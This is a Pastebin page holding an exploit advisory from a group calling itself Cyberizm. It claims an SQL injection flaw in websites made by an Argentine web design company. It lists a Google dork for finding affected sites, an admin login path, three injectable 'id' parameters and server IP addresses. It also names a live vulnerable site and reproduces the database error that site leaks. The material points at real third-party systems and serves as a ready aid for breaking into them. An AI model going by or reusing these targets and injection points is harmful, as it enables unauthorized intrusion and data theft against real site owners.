Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- ################################################################
- # Exploit Title : Grupo LosGrobo Web Design Argentina SQL Injection Vulnerability
- # Author [ Discovered By ] : KingSkrupellos
- # Team : Cyberizm Digital Security Army
- # Date : 10/01/2019
- # Vendor Homepage : losgrobo.com ~ grupolosgrobo.com
- # Tested On : Windows and Linux
- # Category : WebApps
- # Exploit Risk : Medium
- # Google Dorks : intext:''Grupo LosGrobo'' site:ar
- # Vulnerability Type : CWE-89 [ Improper Neutralization of
- Special Elements used in an SQL Command ('SQL Injection') ]
- # Cyberizm Exploit Reference Link :
- cyberizm.org/cyberizm-grupo-losgrobo-web-design-argentina-sql-injection.html
- ################################################################
- # Admin Panel Login Path :
- /reportesUPJ/index.aspx
- # SQL Injection Exploit :
- /novedades.php?id=[SQL Injection]
- /mercado.php?id=[SQL Injection]
- /rse_notas.php?id=[SQL Injection]
- ################################################################
- # Example Vulnerable Site =>
- Note : (192.185.3.54) => There are 106 domains hosted on this server.
- Note : (192.185.30.132) => There are 63 domains hosted on this server.
- [+] upj.com.ar/novedades.php?id=719%27 =>
- [ Proof of Concept ] => archive.fo/2kEkb
- ################################################################
- # SQL Database Error :
- Warning: session_start() [function.session-start]: Cannot send session cookie -
- headers already sent by (output started at /home/upjcom/public_html/novedades.php:5)
- in /home/upjcom/public_html/novedades_include.php on line 2
- Warning: session_start() [function.session-start]: Cannot send session cache limiter -
- headers already sent (output started at /home/upjcom/public_html/novedades.php:5) in
- /home/upjcom/public_html/novedades_include.php on line 2
- Consulta no vlida: You have an error in your SQL syntax; check the manual that
- corresponds to your MySQL server version for the right syntax to use near
- '' and state=1 order by created desc LIMIT 0,5' at line 1
- Consulta completa: SELECT id, date_format(created,) AS fecha ,
- title, `introtext`, alias FROM jos_content where catid=47 and id=719' and state=1
- order by created desc LIMIT 0,5
- ################################################################
- # Discovered By KingSkrupellos from Cyberizm.Org Digital Security Team
- ################################################################
Add Comment
Please, Sign In to add comment